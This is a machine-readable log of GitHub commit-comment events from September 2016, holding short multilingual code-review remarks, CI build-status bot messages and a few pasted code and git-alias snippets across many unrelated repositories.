{"id":"4566532181","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031684,"position":20,"line":15,"path":"partial/index/about-block.php","commit_id":"4e6eb2092e21c90492110da0186ea42908d5047f","created_at":"2016-09-15T07:34:18Z","updated_at":"2016-09-15T07:34:18Z","body":"Собери имя файла заранее (в двух местах уже используешь) и положи в переменную."}},"created_at":"2016-09-15T07:34:18Z"}
{"id":"4566532231","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19031685,"position":27,"line":111,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T07:34:19Z","updated_at":"2016-09-15T07:34:19Z","body":"Done."}},"created_at":"2016-09-15T07:34:19Z"}
{"id":"4566532938","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19031687,"position":62,"line":171,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T07:34:32Z","updated_at":"2016-09-15T07:34:32Z","body":"Done."}},"created_at":"2016-09-15T07:34:32Z"}
{"id":"4566533217","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":19031691,"position":1,"line":1,"path":"To Anil","commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-15T07:34:38Z","updated_at":"2016-09-15T07:34:38Z","body":"[Sudoku.zip](https://github.com/anilhdas/Peak_ARG/files/474051/Sudoku.zip)\r\n"}},"created_at":"2016-09-15T07:34:38Z"}
{"id":"4566533611","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031693,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T07:34:46Z","updated_at":"2016-09-15T07:34:46Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T07:34:46Z"}
{"id":"4566536879","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031721,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T07:35:42Z","updated_at":"2016-09-15T07:35:42Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T07:35:42Z"}
{"id":"4566538410","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19031725,"position":7,"line":238,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-15T07:36:11Z","updated_at":"2016-09-15T07:36:11Z","body":"The print already had been removed. "}},"created_at":"2016-09-15T07:36:11Z"}
{"id":"4566539139","type":"CommitCommentEvent","actor":{"login":"ThePreviousOne"},"repo":{"name":"beepFTW/tachiyomi"},"payload":{"comment":{"id":19031728,"position":35,"line":317,"path":"app/src/main/java/eu/kanade/tachiyomi/ui/catalogue_latest/CatalogueLatestPresenter.kt","commit_id":"847df97a0904d5912cd72977c548589194ce0060","created_at":"2016-09-15T07:36:22Z","updated_at":"2016-09-15T07:36:22Z","body":"My bad I forgot to flip this"}},"created_at":"2016-09-15T07:36:22Z"}
{"id":"4566539486","type":"CommitCommentEvent","actor":{"login":"sjnewbury"},"repo":{"name":"libretro/bsnes-libretro"},"payload":{"comment":{"id":19031731,"position":null,"line":null,"path":null,"commit_id":"17cbfb15205f7e7ea54574ce5db63c0a7cd96841","created_at":"2016-09-15T07:36:27Z","updated_at":"2016-09-15T07:36:27Z","body":"Okay.  Will do."}},"created_at":"2016-09-15T07:36:27Z"}
{"id":"4566542384","type":"CommitCommentEvent","actor":{"login":"krichprollsch"},"repo":{"name":"clermontech/Introducing-APIHours"},"payload":{"comment":{"id":19031739,"position":50,"line":87,"path":"introducing-apihours.md","commit_id":"13f5840a38476ab6ca34ae3bfa947737067b7a7d","created_at":"2016-09-15T07:37:18Z","updated_at":"2016-09-15T07:37:18Z","body":" :white_check_mark:  ba255796abcff25dfc36289e8c03c55ee6aa55f0"}},"created_at":"2016-09-15T07:37:18Z"}
{"id":"4566543990","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19031748,"position":null,"line":null,"path":null,"commit_id":"a7554879a8d59027cee338701880dfd462bbf553","created_at":"2016-09-15T07:37:46Z","updated_at":"2016-09-15T07:37:46Z","body":"TeamCity Todo :: Build [Build 97](http://109.103.226.38:8512/viewLog.html?buildId=38492&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T07:37:46Z"}
{"id":"4566544447","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19031753,"position":6,"line":828,"path":"spring-boot/src/test/java/org/springframework/boot/context/config/ConfigFileApplicationListenerTests.java","commit_id":"0606428609597961da5f20c8a3305222812df989","created_at":"2016-09-15T07:37:54Z","updated_at":"2016-09-15T07:37:54Z","body":"Good catch, fixed in https://github.com/spring-projects/spring-boot/commit/8470ecb4d05c2bcaadd9c58cc7564d7687ae02cd"}},"created_at":"2016-09-15T07:37:54Z"}
{"id":"4566545063","type":"CommitCommentEvent","actor":{"login":"lhoss"},"repo":{"name":"mesosphere/dcos-zeppelin"},"payload":{"comment":{"id":19031755,"position":5,"line":29,"path":"package/marathon.json.mustache","commit_id":"05885a4766efb0dd0f23487ebf65cbf15e2b4efb","created_at":"2016-09-15T07:38:07Z","updated_at":"2016-09-15T07:38:07Z","body":"SnPARK_HOME_TGZ  typo !?"}},"created_at":"2016-09-15T07:38:07Z"}
{"id":"4566545446","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19031756,"position":null,"line":null,"path":null,"commit_id":"a7554879a8d59027cee338701880dfd462bbf553","created_at":"2016-09-15T07:38:14Z","updated_at":"2016-09-15T07:38:14Z","body":"TeamCity Todo :: Build [Build 97](http://109.103.226.38:8512/viewLog.html?buildId=38492&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 13 Build time: 00:00:24"}},"created_at":"2016-09-15T07:38:14Z"}
{"id":"4566546943","type":"CommitCommentEvent","actor":{"login":"treo"},"repo":{"name":"deeplearning4j/libnd4j"},"payload":{"comment":{"id":19031759,"position":null,"line":null,"path":null,"commit_id":"1af297967e0a45ed44489ead826695121037aad3","created_at":"2016-09-15T07:38:40Z","updated_at":"2016-09-15T07:38:40Z","body":"Oh come on, I expected that at least cmake would be consistent across platforms... I'll try to find a different solution then."}},"created_at":"2016-09-15T07:38:40Z"}
{"id":"4566550561","type":"CommitCommentEvent","actor":{"login":"unixbhaskar"},"repo":{"name":"unixbhaskar/GNU-Linux-OpsWiki"},"payload":{"comment":{"id":19031766,"position":null,"line":null,"path":null,"commit_id":"5f6502259452705e9953e2632d8bedbc6caa87b2","created_at":"2016-09-15T07:39:44Z","updated_at":"2016-09-15T07:39:44Z","body":"git-com-vrfy : git verify-commit --verbose `git log -1 | grep commit | gawk '{ print $2}'`\r\n\r\ngit logline : alias.logline=log  --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit"}},"created_at":"2016-09-15T07:39:44Z"}
{"id":"4566553854","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031776,"position":9,"line":9,"path":"app/src/main/java/brain/parsingtest3/Bank.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:40:41Z","updated_at":"2016-09-15T07:40:41Z","body":"это нужно переименовать просто в `name`, потому что и так понятно, что он это имя банка: поле объявлено в классе `Bank`"}},"created_at":"2016-09-15T07:40:41Z"}
{"id":"4566554276","type":"CommitCommentEvent","actor":{"login":"UnrealCatze"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19031779,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-15T07:40:49Z","updated_at":"2016-09-15T07:40:49Z","body":"guess this is wrong\r\ni miss some code at end\r\n\r\n```\r\nfunction fusion_get_locale($key = NULL, $include_file = \"\") {\r\n    global $locale;\r\n\r\n    $is_sanitized = TRUE;\r\n\r\n    if ($include_file && is_file($include_file)) {\r\n        include $include_file;\r\n    }\r\n\r\n    if (!empty($locale) && $is_sanitized == TRUE) {\r\n        return $key === NULL ? $locale : (isset($locale[$key]) ? $locale[$key] : $locale);\r\n    }\r\n\r\n    return NULL;\r\n}\r\n```\r\n\r\nwhen i add this again my site works again ... when not my site get blank site\r\n"}},"created_at":"2016-09-15T07:40:49Z"}
{"id":"4566554439","type":"CommitCommentEvent","actor":{"login":"jlucidar"},"repo":{"name":"FabMo/FabMo-Engine"},"payload":{"comment":{"id":19031780,"position":74,"line":114,"path":"dashboard/apps/configuration.fma/index.html","commit_id":"ac62bbb7dc87936b3c52f1d6f8f243e5efbba88c","created_at":"2016-09-15T07:40:51Z","updated_at":"2016-09-15T07:40:51Z","body":"bad merge !"}},"created_at":"2016-09-15T07:40:51Z"}
{"id":"4566556615","type":"CommitCommentEvent","actor":{"login":"chusiang"},"repo":{"name":"chusiang/sandbox"},"payload":{"comment":{"id":19031784,"position":137,"line":137,"path":"chef/src/cookbooks/zabbix-agent/templates/default/zabbix_agentd.conf.erb","commit_id":"163c436e26198227902f0e1fdd1946e953d4a306","created_at":"2016-09-15T07:41:29Z","updated_at":"2016-09-15T07:41:29Z","body":"在 Chef 的 template 裡要直接抓 Linux 的 hostname 名稱的話，可使用 node.name 這個變數。\r\n\r\n- [Node Name in Chef Template? - Stack Overflow](http://stackoverflow.com/a/10299850/686105)"}},"created_at":"2016-09-15T07:41:29Z"}
{"id":"4566561783","type":"CommitCommentEvent","actor":{"login":"kosim21"},"repo":{"name":"kosim21/ftorrent"},"payload":{"comment":{"id":19031791,"position":1,"line":1,"path":".gitignore","commit_id":"b864fd4377817e2f6259c50c2e99ef746afa1940","created_at":"2016-09-15T07:42:58Z","updated_at":"2016-09-15T07:42:58Z","body":"jajafkjlkfjmvsklmfvfmv,sflav x v,mfsmfmf,mfsfsfs,fsfsfsfvgddvdvdvd"}},"created_at":"2016-09-15T07:42:58Z"}
{"id":"4566561976","type":"CommitCommentEvent","actor":{"login":"blubster38"},"repo":{"name":"blubster38/scheme-phelma"},"payload":{"comment":{"id":19031793,"position":null,"line":null,"path":null,"commit_id":"272fcf0bb93826487c6ed419d690ecb9e3923b59","created_at":"2016-09-15T07:43:02Z","updated_at":"2016-09-15T07:43:02Z","body":"Mais c'est de la merde"}},"created_at":"2016-09-15T07:43:02Z"}
{"id":"4566566076","type":"CommitCommentEvent","actor":{"login":"Andycar"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19031805,"position":null,"line":null,"path":null,"commit_id":"5989da3d46dab497a2ec03ef6c9c42dc25f0b612","created_at":"2016-09-15T07:44:11Z","updated_at":"2016-09-15T07:44:11Z","body":"nice one :) "}},"created_at":"2016-09-15T07:44:11Z"}
{"id":"4566566147","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19031806,"position":9,"line":249,"path":"resources/qml/Preferences/MaterialsPage.qml","commit_id":"e12acb81100874e974445fbeb9740d9f6783397c","created_at":"2016-09-15T07:44:12Z","updated_at":"2016-09-15T07:44:12Z","body":"Does this actually happen? If I recall correctly base_file is always filled."}},"created_at":"2016-09-15T07:44:12Z"}
{"id":"4566570759","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031815,"position":10,"line":10,"path":"app/src/main/java/brain/parsingtest3/Bank.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:45:28Z","updated_at":"2016-09-15T07:45:28Z","body":"Курс валюты -- это Exchange Rate, `Course` -- это другой курс"}},"created_at":"2016-09-15T07:45:28Z"}
{"id":"4566570828","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19031816,"position":null,"line":null,"path":null,"commit_id":"a7554879a8d59027cee338701880dfd462bbf553","created_at":"2016-09-15T07:45:29Z","updated_at":"2016-09-15T07:45:29Z","body":"TeamCity Todo :: Build [Build 98](http://109.103.226.38:8512/viewLog.html?buildId=38493&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T07:45:29Z"}
{"id":"4566571375","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19031819,"position":78,"line":59,"path":"src/helpers/ExtendedPriceHelper.php","commit_id":"c18b635327365b230ec691744efb6fe4efa3cf5b","created_at":"2016-09-15T07:45:38Z","updated_at":"2016-09-15T07:45:38Z","body":"Change this code to more short, please. Like as:\r\n```php\r\n->andWhere(\r\n    [\r\n        'OR',\r\n        ['context_id' => null],\r\n        ['context_id' => \\Yii::$app->multilingual->context_id],\r\n    ]\r\n)\r\n```\r\n"}},"created_at":"2016-09-15T07:45:38Z"}
{"id":"4566571767","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19031820,"position":null,"line":null,"path":null,"commit_id":"a7554879a8d59027cee338701880dfd462bbf553","created_at":"2016-09-15T07:45:44Z","updated_at":"2016-09-15T07:45:44Z","body":"TeamCity Todo :: Build [Build 98](http://109.103.226.38:8512/viewLog.html?buildId=38493&buildTypeId=Todo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 12 Build time: 00:00:07\n### Failed tests\n```\nEmpty Item.PhantomJS 2.1.1 (Linux 0.0.0): will not be added to view: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-15T07:45:44Z"}
{"id":"4566572001","type":"CommitCommentEvent","actor":{"login":"chaosvolt"},"repo":{"name":"kilozombie/Cataclysm-DDA"},"payload":{"comment":{"id":19031821,"position":null,"line":null,"path":null,"commit_id":"4b57c9c719898522ccce89ef3d338aa690df0506","created_at":"2016-09-15T07:45:48Z","updated_at":"2016-09-15T07:45:48Z","body":"Ah, nice. Seems to better fit the general tone of survivor's notes better, as well."}},"created_at":"2016-09-15T07:45:48Z"}
{"id":"4566573794","type":"CommitCommentEvent","actor":{"login":"jgillis"},"repo":{"name":"casadi/casadi"},"payload":{"comment":{"id":19031830,"position":29,"line":1281,"path":"casadi/core/function/integrator.cpp","commit_id":"9f37e5a1ecdb4baef94564d0b3a0b1ba20e98d01","created_at":"2016-09-15T07:46:17Z","updated_at":"2016-09-15T07:46:17Z","body":"@jaeandersson  Why such a weak check? Why not e.size2()==nrhs?"}},"created_at":"2016-09-15T07:46:17Z"}
{"id":"4566573843","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19031832,"position":5,"line":139,"path":"scripts/h5peditor-dimensions.js","commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-15T07:46:18Z","updated_at":"2016-09-15T07:46:18Z","body":"Have you checked that this works with a translation?"}},"created_at":"2016-09-15T07:46:18Z"}
{"id":"4566574194","type":"CommitCommentEvent","actor":{"login":"dextercd"},"repo":{"name":"dextercd/gittest"},"payload":{"comment":{"id":19031833,"position":null,"line":null,"path":null,"commit_id":"5bfcd7e71e2d01afa45db6442795a7d26f5b4eb8","created_at":"2016-09-15T07:46:24Z","updated_at":"2016-09-15T07:46:24Z","body":"failed at adding \"inline\" messages"}},"created_at":"2016-09-15T07:46:24Z"}
{"id":"4566574340","type":"CommitCommentEvent","actor":{"login":"Warrior-"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19031834,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T07:46:26Z","updated_at":"2016-09-15T07:46:26Z","body":"а я бы оставил)"}},"created_at":"2016-09-15T07:46:26Z"}
{"id":"4566574478","type":"CommitCommentEvent","actor":{"login":"ralfbecker"},"repo":{"name":"EGroupware/egroupware"},"payload":{"comment":{"id":19031835,"position":null,"line":null,"path":null,"commit_id":"57edc511ce100e5e87c652a0ac87937c09b5ff60","created_at":"2016-09-15T07:46:28Z","updated_at":"2016-09-15T07:46:28Z","body":"@hnategh @birgit-stylite I believe the removed code is necessary to allow customized templates. We need to check that, before updating further."}},"created_at":"2016-09-15T07:46:28Z"}
{"id":"4566575874","type":"CommitCommentEvent","actor":{"login":"energizerpiggy"},"repo":{"name":"tunabrain/physiclock"},"payload":{"comment":{"id":19031841,"position":5,"line":23,"path":"index.html","commit_id":"de99d415ea2c4e7039eacc934da63252221f12cb","created_at":"2016-09-15T07:46:50Z","updated_at":"2016-09-15T07:46:50Z","body":"10:10\r\n"}},"created_at":"2016-09-15T07:46:50Z"}
{"id":"4566576781","type":"CommitCommentEvent","actor":{"login":"rohityadavrv"},"repo":{"name":"rohityadavrv/Sigma"},"payload":{"comment":{"id":19031844,"position":null,"line":null,"path":null,"commit_id":"105bdc77b020aa67da698eee9ec0b415ee9b71b4","created_at":"2016-09-15T07:47:06Z","updated_at":"2016-09-15T07:47:06Z","body":"hg"}},"created_at":"2016-09-15T07:47:06Z"}
{"id":"4566578150","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031848,"position":10,"line":10,"path":"app/src/main/java/brain/parsingtest3/Course.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:47:27Z","updated_at":"2016-09-15T07:47:27Z","body":"`enum`ы с большой буквы принято называть, а их значения -- все заглавными, например:\r\n```java\r\npublic enum Kind { BUY, SELL };\r\n```"}},"created_at":"2016-09-15T07:47:27Z"}
{"id":"4566580903","type":"CommitCommentEvent","actor":{"login":"mcmart"},"repo":{"name":"mcmart/DEV"},"payload":{"comment":{"id":19031855,"position":2,"line":2,"path":"README.md","commit_id":"1612dbb896d0185e8c6dcca9e2abcde73b5b8614","created_at":"2016-09-15T07:48:13Z","updated_at":"2016-09-15T07:48:13Z","body":" MC MART proprietor"}},"created_at":"2016-09-15T07:48:13Z"}
{"id":"4566581907","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031857,"position":12,"line":12,"path":"app/src/main/java/brain/parsingtest3/Course.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:48:29Z","updated_at":"2016-09-15T07:48:29Z","body":"тоже, что и с `Kind`, только: `dosn` -> `DOWN`, `non` -> `Neutral`"}},"created_at":"2016-09-15T07:48:29Z"}
{"id":"4566582107","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19031858,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-15T07:48:31Z","updated_at":"2016-09-15T07:48:31Z","body":"\"Abba Susan Family Survey\" \"28 days ago\"\r\n\"Rapport Familial pour Abba Susan\" \"Il y a 28 jours\"\r\nYup!\r\nBut latest mocks have it on 2 lines : https://projects.invisionapp.com/share/JA89C042Q#/screens/179840795\r\n(layout is still evolving, wait until end of freeze)"}},"created_at":"2016-09-15T07:48:31Z"}
{"id":"4566582253","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19031859,"position":219,"line":527,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T07:48:34Z","updated_at":"2016-09-15T07:48:34Z","body":"@rootfs I didnt include it in this commit, considering these thoughts. \r\n*) Do we need to delete the endpoint, if it was created by admin earlier? \r\n*) Also in below scenario, \r\nif claimA created ep called \"cluster-1\" and claimB see \"cluster-1\" exist and use it. Later claimA delete  \"cluster-1' ,  can cause  claimB mount to fail. \r\nnow, If we are not deleting the ep/svc at time of volume delete:\r\nAt max, there will be eps or svcs equal to number of clusters. Its mostly one or if at all there are more, it will be very less in count. \r\nI am ready to take any direction though. "}},"created_at":"2016-09-15T07:48:34Z"}
{"id":"4566584066","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031863,"position":15,"line":15,"path":"app/src/main/java/brain/parsingtest3/Course.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:49:03Z","updated_at":"2016-09-15T07:49:03Z","body":"`nameBank` -> `bank`"}},"created_at":"2016-09-15T07:49:03Z"}
{"id":"4566584753","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19031867,"position":67,"line":188,"path":"resources/qml/Preferences/MachinesPage.qml","commit_id":"0693c0284b4fe074a118649dd0ec3993221650ea","created_at":"2016-09-15T07:49:15Z","updated_at":"2016-09-15T07:49:15Z","body":"This can happen. If the printer is changing amterial it should get in that state. "}},"created_at":"2016-09-15T07:49:15Z"}
{"id":"4566585093","type":"CommitCommentEvent","actor":{"login":"iVovolk"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19031870,"position":35,"line":43,"path":"src/components/calculator/Calculator.php","commit_id":"c18b635327365b230ec691744efb6fe4efa3cf5b","created_at":"2016-09-15T07:49:21Z","updated_at":"2016-09-15T07:49:21Z","body":"1. Duplicated piece from previous case.\r\n2. As were discussed previously should conversion be here or in `Price`?"}},"created_at":"2016-09-15T07:49:21Z"}
{"id":"4566586563","type":"CommitCommentEvent","actor":{"login":"energizerpiggy"},"repo":{"name":"tunabrain/physiclock"},"payload":{"comment":{"id":19031872,"position":29,"line":28,"path":"clock.js","commit_id":"3b256c51c7937922c21bfe978b32a00a35ea76c2","created_at":"2016-09-15T07:49:46Z","updated_at":"2016-09-15T07:49:46Z","body":"Well you can help find what I need here"}},"created_at":"2016-09-15T07:49:46Z"}
{"id":"4566587015","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19031873,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-15T07:49:53Z","updated_at":"2016-09-15T07:49:53Z","body":"This looks like a multiline message to me..."}},"created_at":"2016-09-15T07:49:53Z"}
{"id":"4566588734","type":"CommitCommentEvent","actor":{"login":"dmitrygusev"},"repo":{"name":"vais51/Bank"},"payload":{"comment":{"id":19031877,"position":36,"line":36,"path":"app/src/main/java/brain/parsingtest3/MainActivity.java","commit_id":"84c5e56650a7538af5fcaacdb391634e82079a61","created_at":"2016-09-15T07:50:21Z","updated_at":"2016-09-15T07:50:21Z","body":"Вот этот код нужно вынести в отдельный класс, который будет парсить сайт и возвращать список банков"}},"created_at":"2016-09-15T07:50:21Z"}
{"id":"4566589350","type":"CommitCommentEvent","actor":{"login":"ZogStriP"},"repo":{"name":"discourse/DiscourseMobile"},"payload":{"comment":{"id":19031879,"position":null,"line":null,"path":null,"commit_id":"50bb19cbaecaedc7f4e101aa846b1de9395a95ab","created_at":"2016-09-15T07:50:31Z","updated_at":"2016-09-15T07:50:31Z","body":"👍 "}},"created_at":"2016-09-15T07:50:31Z"}
{"id":"4566589532","type":"CommitCommentEvent","actor":{"login":"Sw2rT1"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19031880,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T07:50:34Z","updated_at":"2016-09-15T07:50:34Z","body":"Тогда давайте вернем дебафы пандарии, катаклизма и прочего."}},"created_at":"2016-09-15T07:50:34Z"}
{"id":"4566589903","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19031881,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-15T07:50:39Z","updated_at":"2016-09-15T07:50:39Z","body":"And this looks like a reason o;\r\n\r\nhttps://github.com/Zarel/Pokemon-Showdown/blob/03b9a35f55263a5a3e0ca636688218164a6fdc52/command-parser.js#L154"}},"created_at":"2016-09-15T07:50:39Z"}
{"id":"4566591490","type":"CommitCommentEvent","actor":{"login":"gribozavr"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19031885,"position":7,"line":953,"path":"stdlib/public/core/Arrays.swift.gyb","commit_id":"1201d96cb290c2e3e1ffc68fca1b29e04a345836","created_at":"2016-09-15T07:51:05Z","updated_at":"2016-09-15T07:51:05Z","body":"Please wrap to 80 columns."}},"created_at":"2016-09-15T07:51:05Z"}
{"id":"4566594924","type":"CommitCommentEvent","actor":{"login":"spinza"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19031896,"position":null,"line":null,"path":null,"commit_id":"9db13372caa65c8a791663622f9955972bd082a3","created_at":"2016-09-15T07:52:04Z","updated_at":"2016-09-15T07:52:04Z","body":"Should this not check for all SwOS devices:\r\nRB250GS, RB260GS, RB260GSP"}},"created_at":"2016-09-15T07:52:04Z"}
{"id":"4566599417","type":"CommitCommentEvent","actor":{"login":"duncanspumpkin"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19031904,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T07:53:14Z","updated_at":"2016-09-15T07:53:14Z","body":"We should have taken the opportunity to rename this var "}},"created_at":"2016-09-15T07:53:14Z"}
{"id":"4566604045","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19031908,"position":6,"line":126,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"d24422ba9750b447fba67a2ac59b35acc275a5b7","created_at":"2016-09-15T07:54:28Z","updated_at":"2016-09-15T07:54:28Z","body":"In fact instead of deleting this, make sure that if the pawn is dead and there is a bonus"}},"created_at":"2016-09-15T07:54:28Z"}
{"id":"4566604943","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19031911,"position":7,"line":124,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"d24422ba9750b447fba67a2ac59b35acc275a5b7","created_at":"2016-09-15T07:54:43Z","updated_at":"2016-09-15T07:54:43Z","body":"Delete if this logging is no longer needed"}},"created_at":"2016-09-15T07:54:43Z"}
{"id":"4566605405","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031915,"position":5,"line":72,"path":"local/templates/.default/components/bitrix/catalog/catalog/bitrix/catalog.element/.default/template.php","commit_id":"12a5b79b4ec7fdd03da4668cbd20aec4123590f5","created_at":"2016-09-15T07:54:51Z","updated_at":"2016-09-15T07:54:51Z","body":"Измени класс. По гайду это js-sticky-btn"}},"created_at":"2016-09-15T07:54:51Z"}
{"id":"4566606844","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19031919,"position":64,"line":72,"path":"src/components/calculator/Calculator.php","commit_id":"c18b635327365b230ec691744efb6fe4efa3cf5b","created_at":"2016-09-15T07:55:16Z","updated_at":"2016-09-15T07:55:16Z","body":"Replace `code doubles`."}},"created_at":"2016-09-15T07:55:16Z"}
